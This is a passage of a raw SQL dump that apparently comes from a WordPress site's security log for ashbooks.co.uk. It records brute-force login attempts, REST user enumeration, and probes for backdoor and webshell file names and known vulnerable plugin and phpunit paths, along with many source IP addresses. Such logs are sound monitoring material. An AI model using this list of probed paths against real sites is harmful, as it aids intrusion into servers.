ks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637176039.8294,18,'RUMJfI369ljdxH0NgBkbiD4y','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637176041.9224,55,'8NAwqBudXvl0xbZSoc5TYyOD','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637176043.9447,100,'VdnsyZzkjXBfFJA02WSoqevL','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637176045.9819,100,'KGZQdcEw87jFxmu6PUqohJfs','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637176047.9317,55,'fzXOuUVMP92KED6SFNYI8JWT','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637176049.9961,100,'F03Bp4gmvAE6wrHYc1CoSWiX','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637176051.9930,55,'mh0BSo2kHGNWvgilz4YuA3UZ','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637176054.1590,55,'1kBCQSuPjV3Ia5OqGdJveLcU','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637176056.4782,55,'slHP6VX782amjJoRMqKOBDZn','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637176058.8295,55,'9M6OC4EaXkZ0tzTDSYulGUjh','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637176060.7405,55,'QbaYXNOmAst2z4PcdMJHV9nT','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637176062.5847,55,'azWXPpfLDe148HnvRq2c67li','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637176064.6312,55,'LB7z5GRwyqPfdYOsVvFSZnl9','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637176067.2806,100,'45bA2TvK39NSLFlOHMWeGkVP','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637176069.3357,55,'TWFkiAfUyGQ3SCrRvx15P8eN','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637176071.7587,55,'O31qKdZLmoUpxjAaCDTtXHsM','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637176075.1039,55,'bfXMBYANSEDLGZ93hdIOkgJm','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('122.128.106.186',2055236282,'admin',0,1637177039.8981,7,'dx4HLIBfSuDRnAQC10Vv8re5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.220.102.253',3118229245,'test',0,1637178220.3149,51,'v0icEQ1T5CqapVdfKNOF7UGA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.163.232.79',1168369743,'admin',0,1637178398.1201,7,'jPZIRgDoW6phwJ7sT4e3mQbM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('204.12.198.244',3423389428,'admin',0,1637179354.6299,7,'QGbV4qEZvNR2FfOI59lj83um','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.217.109',1159649645,'ashbooks',0,1637181263.4535,51,'yHw7D4ZJlQWGpNF5Lj86Pbrv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('94.153.161.234',1587126762,'admin',0,1637182524.2660,7,'ZNBT9JLHYPV0nwc7dyD2bmav','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.217.109',1159649645,'admin',0,1637182825.6351,7,'cevrupaFMYnBWEiUslkRZLyV','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.163.232.79',1168369743,'admin',0,1637183970.0839,7,'hY0XaPSZ82GsvfLerJlcO5qN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.158.15.145',765333393,'',0,1637184088.2477,55,'LR7TJWKer410DgEin3FVPtMo','','19|0|0|0|ashbooks.co.uk/wp-content/themes/sketch/404.php'),('103.142.26.247',1737366263,'admin',0,1637185319.9273,7,'bkyuv4UW9AjmiYZKeORgH2zc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('128.199.190.211',2160574163,'admin',0,1637188012.8366,7,'5Xbc4CVasowvHS0jUMT2rkPQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.206',3233511118,'admin',0,1637188989.0735,7,'jyNP3S9GukRBdmzhLtw4XI2q','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('23.23.6.16',387384848,'',0,1637190087.1579,70,'f9iBwjzoltEN5SkTuOcRgJ18','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('167.86.118.101',2807461477,'admin',0,1637190681.4558,7,'vqkwobZtMNAeSVP5sUEz7GLl','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.208.152.238',2916129006,'ashbooks',0,1637191307.6649,51,'gAb5mwQlKNCxqJjp2LDBikXY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.158.15.146',765333394,'',0,1637192494.3535,55,'XcF32wVbNz5mxYsETteJjiKW','','19|0|0|0|ashbooks.co.uk/wp-sling.php'),('39.107.236.213',661384405,'',0,1637192843.4863,55,'A1dqywW3BUTb4rVne9Q2ZjFp','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('161.97.146.123',2707526267,'admin',0,1637193439.6894,7,'f7ljTn28vFd3eoIKsbMGrzUB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.158.15.145',765333393,'',0,1637193961.7486,55,'lJTKAdx1ocvHQpeu5m9FzCNR','','19|0|0|0|ashbooks.co.uk/style.php'),('188.166.56.218',3165010138,'admin',0,1637194797.1455,7,'b9B1IWQPjYiNloFLdED6AvuJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.150.57.34',1805007138,'admin',0,1637196067.1311,7,'TxBUfhFjbeuLRQ09c8s73Wdk','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('95.217.195.206',1608106958,'admin',0,1637196141.1379,7,'EwtH9vl1XQzSPBg54aJjb3VM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('204.12.198.244',3423389428,'ashbooks',0,1637196628.1442,51,'f2t6TJGPh3AcZEQ47emzMWi5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.68.69.48',2319729968,'admin',0,1637198904.4615,7,'BijuUhlDVPsdWr2ZKSOQoGwv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'admin',0,1637199744.7696,7,'gh9l4wLukUx3DdGfSRen2V0B','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'admin',0,1637199749.3310,7,'JK8pwAoec3OYhL0mUNat1EqR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'admin',0,1637199757.3278,7,'t6bwrR0yLlEdaozPVpCOFhKZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('197.3.8.18',3305310226,'admin',0,1637199763.0219,7,'lVpdv3HcjeYsJZn5u1xTSLNO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('121.43.170.78',2032904782,'admin',0,1637200401.9863,7,'KXHJonlubM2aGDv0hfygFS53','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.208.152.238',2916129006,'admin',0,1637201921.0389,7,'kzJRCBTcHK4vP6Us5pugraWO','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('178.128.194.13',2994782733,'admin',0,1637201987.1790,7,'XPTYvOm1AocBrd9wZN4y8HUs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('63.141.252.70',1066269766,'ashbooks',0,1637203528.6033,51,'pd3ZEur62qfJL71yHhc9tXin','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.151.64.197',2996256965,'admin',0,1637203571.2888,7,'RrFapl90gj5BcO2nQySCX1wZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.1.209.37',50450725,'admin',0,1637205056.8202,7,'rYtbLTlwMyD3ekmWjs7zIuvS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('155.133.129.13',2609217805,'admin',0,1637206486.4078,7,'L5fprDWyU2deAOV37na6wcuZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('193.148.164.26',3247744026,'admin',0,1637207869.4901,7,'9nz2JpwjU8TVEYRah1qvtcyF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('13.70.143.132',222728068,'',0,1637208057.0164,70,'jy0EgwkcIopOfQHtXYhKVrJx','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('13.70.143.132',222728068,'',0,1637208123.5571,70,'qbm530xXQ7RC1i2EwgGMaHUh','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('13.70.143.132',222728068,'admin',0,1637208128.1432,7,'XntmDL62K8jBeJQWSlAvIdTP','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('185.191.34.215',3116311255,'',0,1637208888.8176,55,'2Oyk3VquMDSP4vhJcdbQI8rg','','19|0|0|0|ashbooks.co.uk/wp-admin/css/colors/index.php'),('69.30.231.155',1159653275,'admin',0,1637208974.9503,7,'v231tgzd7NEDoj0ip4qMYxa5','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('13.70.143.132',222728068,'',0,1637209067.1521,70,'OZ7sm3yEtvGkbw2qxUFVYMSQ','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('13.70.143.132',222728068,'admin',0,1637209068.5848,7,'7iajkCymwFpDHLQhq4OrbXKR','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('159.203.115.159',2680910751,'admin',0,1637209320.0722,7,'PUXLNcsfQ1SGMlCp7er4tqwY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.97.205.210',392285650,'admin',0,1637210841.4003,7,'af3AGNEjwXWsqYgDBkliKV8p','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.166.56.218',3165010138,'admin',0,1637213890.1374,7,'X9W0FzOtomUYcRJIjvfp2xZ6','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('206.189.6.60',3468494396,'admin',0,1637215348.6978,7,'knez1YETOWfiAqK63Q257x4S','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('141.98.83.79',2372031311,'',0,1637215489.9990,100,'SdOpiIE8bKtgPcNorGLBz0nZ','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215490.0070,10,'SdOpiIE8bKtgPcNorGLBz0nZ','','709|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215491.2778,100,'tL4lQcR0TaGNfqPKenk6jxI8','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215492.7696,100,'2suNjcd4B3YfpbReL8XEyr7Q','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215494.3558,100,'GT4ea8wO7gEI32SNtdPiMuLq','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215495.8134,100,'MCt3PDS9QHYabVcAhxvfRzJp','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215497.3959,100,'6DwAEQXvoIqLuxbr9ltmKTc2','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215498.7738,100,'JOgIR9GDlqr5t7PfoQ6hVkbc','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215500.0503,100,'AHneDoi3skqtPNdlL2zjWpfI','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215518.0195,100,'hybt2R0WLiOM1z5q6SkJX8VZ','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215519.4955,100,'RSycnjTZodNsCKevBmM6q51A','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215520.9136,100,'iOP0gtEmfoaeWHpux6l5njL3','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215522.1209,100,'b5Vgyz0t8oUDcf7vdP2eKwQh','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215523.8457,100,'04bBql8tTNe9UzywpjiLFQYI','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215525.6587,100,'flic7D5vQVSHdaATZJo8g2sb','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215544.4803,100,'OTovA5nH2wWX7QLhtFki8mEP','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215552.2936,100,'orl4NbXUfnuVMDmxB8wJdEa0','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('107.150.57.34',1805007138,'admin',0,1637215583.9575,7,'8f7hUBNaDjQAS2E0PMOXy9kJ','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('141.98.83.79',2372031311,'',0,1637215680.6656,100,'OS49dsC7yMnrIFKtekaWw5m2','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215682.5532,100,'UkILZ0o8NMy1f7TKqujAxFVX','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215684.2983,100,'bClyPcZpmHLg4hKDfOUt9EQV','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215685.9611,100,'hsFGednNgHOXz0b8u2Avi4KZ','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215687.4127,100,'YfcjJsgMiHNtrAwmbBR0I7Ql','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215689.2413,100,'UvZCkVlhTDBIRyncjzXGEHQP','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215690.8552,100,'MujlXKoIhFnc2qkQLJyf3vrx','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215692.6937,100,'Y8FfuLXUoaK5RVblcgDyBi7d','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215694.2354,100,'Kej6Iyo1VAqmtOEWMXsSd7UN','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215697.1111,100,'GBj4SuHsJXe6ZI7RWqgDn0Qd','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215704.8093,100,'21lYmHnNKXpqC4rkjIbOUeSx','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215706.6998,100,'FB5ikWvSYmMoZhLdwyuzq1xP','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215708.8098,100,'T6mbBYhAq8wJn4fgEz3WcvPU','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215710.3661,100,'NCk4KzE2GnDV8QJuIZlAaPo5','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215711.8667,100,'nV6jluG4HPXLJZ5wW2YcmaIy','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215713.1145,100,'xQPy3C5rkTqfvIGZwOR6XWAc','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215714.9660,100,'lMSTwDpxKNR1k2qjGCAzLY0t','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215716.9347,100,'cpB4yOuEmX8d9hAxb1nTWLtr','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215719.1009,100,'8szJF9XHY4GtjoWlm2CpNTyB','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215721.1031,100,'X3CdsHaurjfU2z0W74FQJNOV','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215728.4862,100,'ucB0Z2fhFoDUl7tJIj3a8Wi4','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215729.7434,100,'1seMYkORJuLKW90ThqUaPcpS','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215731.1024,100,'qj4BNGXQJCP2dSphAyUR6HIl','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215733.0444,100,'UKOEPmFdZ03spqiSaCbhwL4D','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215734.4772,100,'q5mlB7zhiZkJebWMYVUoKuwn','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215736.7467,100,'Fj9YUEZNR17zphMrqHAi8XLc','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215738.3491,100,'cUMI87uTQeOp5RLsyJDwEVl2','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215739.9001,100,'hVylSZCkF7YW3BspXtdMEgm4','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215741.2634,100,'db83EumlNqVDKwOvC7AzIScF','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215743.0496,100,'8plfsY3uxUDNEICdBgT1rLoJ','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215751.2716,100,'8OrpT1uBJ4sDQC0lXE6Azkfx','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215752.5715,100,'puPRaLQ1CH9vKeminTEJYjtX','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215754.1739,100,'oGHK1jRwEI23JODeT7XabkCc','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215756.1044,100,'PO0oEukcb5ZGwhFNpmLfaMVl','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215757.7611,100,'q3jHs1PoDg0QxSLK9uMbYJyR','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215760.0804,100,'wXpuhik5anlMI1YfHU3vb90s','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215761.9504,100,'8YkfGWv0g7Md3rAaz5QJpDs4','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215763.2863,100,'BIvKgSYcDmVEO2ZXJqjkuT45','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215765.3179,100,'kiBVmzetYwI91Dasbr4pln6f','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215767.0261,100,'2R8uc0x9onIthKBqre6zJyH5','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215774.6885,100,'pntNIc1sXEWoBUfGATHSV7Kb','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215776.3844,100,'XU46AJyCnjdW17u5QOLvPaFh','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215778.4778,100,'hgDps4HxUNFKMXqbtfJVAyvO','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215779.7945,100,'7g0KXPakHSBL5sT9AQGiRNd3','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215781.8221,100,'dI9mOoM8jxlevarLtNhJQZS2','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215783.5776,100,'ekOWHpwGnBNP4vM7Uy2E0aSg','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215785.2261,100,'0lsDURwxfp5PX8qZGj46HOAo','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215787.0725,100,'woDj7rcndQvRAP1KXmbSza9M','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215788.5173,100,'5Ux13Bzo7eEGVCYwKkORb2gL','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215790.4741,100,'MIaTAXhqVYJUx6pDH3vFLjSG','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215798.7225,100,'O7MDBzy3LTQdWlRFuY0cCNJn','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215800.6428,100,'hIfYb7CxP6TlrVFRsoD0G5AM','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215802.7115,100,'Pf7BVmK1FlLG259ZvqwMhaDW','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215804.5689,100,'5prYCE479vg60icQs3XTxJaG','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215806.2876,100,'jhI9Mcm5N4OCtXLy1ZBAlErx','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215807.8146,100,'QnwpaOtSADqz1KCGfIReujsB','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215809.5120,100,'JXqBCzl542uGZNYScMfonh8P','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215811.5799,100,'f2jzEKbP9Bx8QUNe7ndoSt13','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215813.3907,100,'nzMHGVJNx0joQvOFmIwi2kgb','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215814.8436,100,'rHUDwokRYIZLXhfWNKzTnB5g','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215823.4649,100,'4rcSotklzJF3UBD1LTisMfbC','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215825.1135,100,'IyafbxsWo6w53QZmh7epOP2D','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215826.6927,100,'rTlYyjcGmq9vPwB2ne06D31O','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215828.1481,100,'4KY71Rq9AQsGgpJbU5VImhNv','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215829.7987,100,'dEr0Ip75JvmUGlcPeYuyQHiW','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215831.1521,100,'aM4AW1kgj5rCtcGVvpSBynfF','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215833.2025,100,'Up0JiGAV4C5aQLeOIrTNZfy2','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215835.2357,100,'ayrR4YzcDENnfLsxQu7lpBKg','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215837.0951,100,'ZJyDUqLWaBCfPK6eOImcYGsR','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215839.1577,100,'kB1i8YpH0SzeXdmPoQ2Wj5fM','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215848.7262,100,'MJnqafSVtvAruTd4oQU2pLyG','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215850.6850,100,'hOMHkpg7W0moTBnzSdPRr59w','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215852.0335,100,'TfsWK2zlHSxLAbOQow8jYgkC','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215854.1102,100,'dFC40P9yJAbtkupwHSjXrfem','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215857.2001,100,'iElghcmCs7Yv6P1wtZaefSRd','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215858.8684,100,'6PHe5ED9RKfQ1X7AbLChzSck','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215860.3680,100,'t13LN7AQHpd9FBJ4ShfaGIzg','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215862.1719,100,'rY75nFJNPy0j9pHVcQzqGS3I','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215863.5774,100,'4vTxfXmc8tVkrSzJ2W0PNoDn','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215866.3179,100,'dBUJo1yIfLnDGZm0xK9rbaVg','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215876.8449,100,'I10BLnCYaK9HgrFR5uw4s3Ay','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215878.4464,100,'G9azgRdokDOiI0c36EhbqQmS','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215880.2925,100,'CFdxUgtZ0syr3kWV8pEHevMa','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215882.2231,100,'W2KFhct3U6jsDa0ArLVZPdwf','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215884.1585,100,'ehJGIbstKrdFzQ7OwTqgp3cR','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215885.6001,100,'MDKIYZ2ze8d4iljfVCQPNAWS','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215886.8662,100,'JCvhc7PM1bFl9puNRmLQKZVY','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215888.5460,100,'E5b7GKvYwtyo02QzcMWx4fXp','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215890.4092,100,'rayieIgOs6zL8dhflNGcRVTU','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215891.8154,100,'eHtBqOiyoAFrvWTSz8gnVpbx','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215901.3460,100,'VzArNq8sXtBYeukPMFHChJ27','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215903.6345,100,'2rbeHV1qMKgs5ZyRAYkhSuFm','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215905.6930,100,'95Xz840YbJGySskfxHeUQT3K','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215907.4873,100,'bpAXcdtiCl8ZaGuIfj2gzV9S','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215909.3342,100,'0m5QfJ6dkvbHYNzFXED7WxG4','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215910.7104,100,'oDsTz9EIq6lZtQUWrHF4GOKv','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215912.1039,100,'n06PilLEtph37caNxf8WrmsX','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215913.4327,100,'wZ2EG6lkvbQjDYBatKN0oqF4','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215914.7515,100,'LEU3joi6DBywWdKxA2JTSM0N','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215916.2450,100,'rT675jfA0heKDaoYbyHEOsLP','','23|0|0|0|www.ashbooks.co.uk/weblog/'),('141.98.83.79',2372031311,'',0,1637215924